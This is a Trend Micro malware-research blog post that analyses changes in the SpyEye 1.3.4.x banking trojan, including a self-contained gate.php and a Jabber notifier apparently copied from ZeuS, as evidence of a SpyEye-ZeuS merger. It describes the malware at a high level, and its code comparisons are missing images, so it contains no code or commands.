SpyEye 1.3.4.x Comes with Noteworthy Modifications (Part 2)
This entry is a follow-up to my blog post last week in which I noted some significant changes that have been made to SpyEye ver. 1.3.4.x. Further observation revealed other modifications that made me think we are getting closer to the merger of the SpyEye and ZeuS botnets.
This SpyEye version comes with a Gate, a CN1 and a SYN1 installer.
 |
 |
This installer page creates the gate.php used for POST requests between the bots and the CN1 control panel. These bots send specific information such as IP address, location, OS, and the like about the infected system to the CN1 panel. The gate.php code functions similar to previous versions, though one can easily see certain improvements. In this version, the gate.php file can now access the database by itself. In previous versions, doing so would require the config.php to retrieve the necessary information (e.g., domain/IP address, user name and password) from the database. The new gate.php file does no require data from external files – as all of the information it needs is already in the file or it only uses functions.
Look at the following comparison of code snippets from versions 1.3..0.5 and 1.3.4.x of the gate.php file:
 |
 |
I also noticed that SpyEye 1.3.4.x has a Jabber Notifier like previous ZeuS builders, which allowed bot masters to more efficiently steal banking credentials than letting data go through a control panel. This is an improvement, as previous SpyEye versions only allowed access to data via a control panel.
Let us take a look at the Jabberclass.php file of ZeuS 2.0.8.9:
 |
 |
 |
 |
Do you see the same thing? The said code looks like it was simply cut and pasted onto SpyEye’s Jabber Notifier from that of ZeuS. I can assure you, that I did not use the same screenshots for the figures.
The only difference between the two is that the gate.php code of ZeuS 2.0.8.9 calls jabberclass.php while that of SpyEye does not. SpyEye already has the equivalent of the jabberclass.php file included in its gate.php code, making it unnecessary to include a separate file just for Jabber notifications. SpyEye also uses a plug-in called jabbernotifier.dll in its config file.
As previously stated, the ZeuS-SpyEye merger indeed seems to be on its way.
Post from: TrendLabs | Malware Blog – by Trend Micro
Spotlight
Cloud Computing
- HR could play leading part in BYOD success
- US still safest bet among data center destinations
- Commission makes controversial security recommendation
- Government agencies working toward secure procurement
Virtualization
- Virtualization-specific challenges could threaten data security
- Evolving threats put security skills in high demand
- Virtualization security requires education, access control management
- Tips for launching effective virtual security tools
Internet Safety
- Virtualization-specific challenges could threaten data security
- Evolving threats put security skills in high demand
- Virtualization security requires education, access control management
- Tips for launching effective virtual security tools
Vulnerabilities & Exploits
CTO Insights
First Line of Defense
Newsletter
Stay up to date with the latest news and information on online threats.
Recent News
- Workforce mobilization becoming the new normal in healthcare
- Best practices for users to stay secure while virtualizing
- HR could play leading part in BYOD success
- US still safest bet among data center destinations
Tag Cloud
cloud cloud computing cloud computing security Cloud Security Compliance & Regulations Consumerization Current News cybercrime Data Privacy data security Encryption Government Policy Internet Protection Internet Safety Internet Safety - DO NOT USE Internet Security Malware Mobile Security Mobility Policy Policy - DO NOT USE Privacy Privacy & Policy Private Cloud Public Cloud Reports Research Spotlight threat intelligence threat research Trend Labs Underground Economy virtualization Vulnerabilities Vulnerabilities - DO NOT USE web security web threats
Comments
No comments yet